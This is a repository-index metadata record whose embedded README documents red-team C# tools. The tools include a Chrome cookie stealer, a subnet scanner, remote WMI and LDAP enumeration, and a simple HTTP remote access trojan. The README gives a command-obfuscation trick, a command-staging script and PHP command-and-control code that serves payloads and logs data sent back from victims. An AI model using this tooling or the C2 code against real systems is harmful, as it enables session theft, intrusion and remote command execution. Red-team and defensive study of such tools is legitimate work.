{"id":13840669,"url":"https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts","last_synced_at":"2025-07-11T09:32:43.290Z","repository":{"id":41517573,"uuid":"196319594","full_name":"Mr-Un1k0d3r/RedTeamCSharpScripts","owner":"Mr-Un1k0d3r","description":"C# Script used for Red Team","archived":false,"fork":false,"pushed_at":"2021-11-16T16:20:31.000Z","size":2768,"stargazers_count":712,"open_issues_count":0,"forks_count":139,"subscribers_count":22,"default_branch":"master","last_synced_at":"2024-08-05T17:25:30.222Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Mr-Un1k0d3r.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-07-11T04:26:40.000Z","updated_at":"2024-07-14T07:11:07.000Z","dependencies_parsed_at":"2022-09-21T11:41:41.153Z","dependency_job_id":null,"html_url":"https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FRedTeamCSharpScripts","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FRedTeamCSharpScripts/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FRedTeamCSharpScripts/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FRedTeamCSharpScripts/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Mr-Un1k0d3r","download_url":"https://codeload.github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/tar.gz/refs/heads/mast
er","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225712620,"owners_count":17512440,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:51.810Z","updated_at":"2024-11-21T10:30:36.527Z","avatar_url":"https://github.com/Mr-Un1k0d3r.png","language":"C#","readme":"# RedTeamCSharpScripts\nC# Script used for Red Team. These binaries can be used by Cobalt Strike execute-assembly or as standalone executables. \n\n\n# LDAP utility\n\nThe utility has been renamed to AdHuntTool and moved to its own repo [https://github.com/Mr-Un1k0d3r/ADHuntTool](https://github.com/Mr-Un1k0d3r/ADHuntTool)\n\n### The CheckManaged feature\n\nActive Directory supports the following two attributes: `managedobjects` and `managedby`. These attributes can be used to assign a manager to an object. It can be a user managing a computer. There is a GPO that can be used to grant local admin to the managedobjects owner. The user will not be listed as a local admin by default, but the correlation between `managedby` and `managedobjects` can identify users that manage computers.\n\nThe `CheckManaged` feature first confirms the presence of the GPO in question by looking at the SYSVOL policies present on the DC. 
If the `groups.xml` is present, it dumps all the users with a `managedobjects` attribute and the computers with a `managedby` attribute.\n\n![managedexample](https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamCSharpScripts/master/managed.png)\n\n# Web Hunter \n\nCSharp version of the Find-Fruit utility https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Find-Fruit.ps1. Tool to query a network subnet looking for valuable assets that can be exploited. \n\n```\nwebhunter.exe 192.168.1.0/24 80,443,8080,8443\n```\n\n```\nwebhunter.exe 192.168.1.0/24 80,443,8080,8443 -verbose\n```\n\n# Cookies Monster\n\nFetch Chrome cookies in plaintext. Perfect to steal a target session cookie through execute-assembly.\n\n```\nUsage: CookiesMonster.exe filter\n```\n\nThe filter argument is optional. If not specified, it will dump all the cookies. Since the cookies are encrypted using ProtectedMemory Windows APIs, you need to have access to the current user context to be able to generate the proper decryption key. 
\n\nThe binary needs to be compiled statically to include the System.Data.SQLite dll.\n\n# WMI Utility\n\nSet of predefined WMI queries that can be used to query CIM classes.\n\nThe utility supports the following options\n\n```\nUsage: WMIUtility.exe options [arguments]\n\nListProcess         Return a list of running process\nListService         List all the services\nQuery               Args (query, columns) wmiutility.exe Query \"Select * From Win32_CommandLineAccess\" \"Name,Description\"\n\nListRemoteProcess   Return a list of running process on the target host\nListRemoteService   Return a list of all the services on the target host\nGet-EventForUser    Search for 4624 events targeting specific user\nRemoteQuery         Args (query, columns) \nGet-Av              Return a list of potential security product\n\nEX:\nwmiutility.exe ListRemoteProcess \u003cComputerName\u003e \u003cUsername\u003e \u003cPassword\u003e\nwmiutility.exe ListRemoteService \u003cComputerName\u003e \u003cUsername\u003e \u003cPassword\u003e\nwmiutility.exe Get-EventForUser \u003csamAccountname\u003e \u003cDomainController\u003e \u003cUsername\u003e \u003cPassword\u003e\nwmiutility.exe Get-EventForUser \u003csamAccountname\u003e all \u003cUsername\u003e \u003cPassword\u003e\nwmiutility.exe RemoteQuery \"Select * From Win32_CommandLineAccess\" \"Name,Description\" \u003cComputerName\u003e \u003cUsername\u003e \u003cPassword\u003e\n```\n\n# enumerateuser.cs\n\nList all the users' samaccountname \u0026 mail\n\n```\nexecute-assembly C:\\enumerateuser.exe domain\n```\n\n# ldapquery.cs\n\nPerform custom LDAP queries\n\n```\nexecute-assembly C:\\enumerateuser.exe ringzer0team \"(\u0026(objectCategory=User)(samaccountname=Mr.Un1k0d3r))\" samaccountname,mail\n\nQuerying LDAP://ringzer0team\nQuerying: (\u0026(objectCategory=User)(samaccountname=Mr.Un1k0d3r))\nExtracting: samaccountname,mail\nMr.Un1k0d3r,Mr.Un1k0d3r@corp.com,\n```\n\n# simple-http-rat.cs\n\nA simple RAT that executes commands over HTTP. 
The code is calling back every 10 seconds and will execute the data present on the callback URL.\n\n`rat.exe callbackurl`\n\nThe data is obfuscated using the following python trick\n\n```\n$ python -c 'import base64; print base64.b64encode(\"cmd.exe /c whoami\")[::-1]'\n=kWbh9Ga3ByYvASZ4VmLk12Y\n```\n\nThe file creation can also be automated using the following script\n\n```\nimport base64\nimport sys\nimport os\n\npath = sys.argv[1]\ncmd = sys.argv[2]\n\nif os.path.exists(path):\n        os.remove(path)\n        \nopen(path, \"w+\").write(base64.b64encode(cmd)[::-1])\nprint \"Command added\"\n```\n\n```\nupdate.py /var/www/html/callback.html \"whoami\"\n```\n\nFor the post back RAT the following PHP code can be used to capture the data\n\n```\n\u003c?php\n$request = (object)array();\n\nif($_SERVER['REQUEST_METHOD'] === \"POST\") {\n        $request-\u003edata = file_get_contents(\"php://input\");\n        $request-\u003eip = $_SERVER[\"REMOTE_ADDR\"];\n        $request-\u003etime = date(\"r\");\n\n        $data = str_replace(\"!)(*\u0026#:\u003c]\", \"A\", $request-\u003edata);\n        $decoded = base64_decode($data);\n\n        file_put_contents(\"/tmp/output.txt\", \"[\" . $request-\u003etime . \"](\" . $request-\u003eip . \"): \" . $decoded . 
\"\\r\\n\", FILE_APPEND);\n} else {\n        echo file_get_contents(\"/tmp/payload.txt\");\n}\n?\u003e\n```\n\n# set.cs (set.exe)\n\nC# equivalent of the Windows set command that does not require spawning cmd.exe\n\n```\nexecute-assembly C:\\set.exe\n\nPROCESSOR_ARCHITEW6432=AMD64\nDriverData=C:\\Windows\\System32\\Drivers\\DriverData\n```\n\n# Credit\n\nMr.Un1k0d3r RingZer0 Team\n\nTazz0 RingZer0 Team\n\n# Contributors\n\n@theFlinkk for the AV module\n","funding_links":[],"categories":["C# (212)","C# #"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FRedTeamCSharpScripts","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FMr-Un1k0d3r%2FRedTeamCSharpScripts","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FRedTeamCSharpScripts/lists"}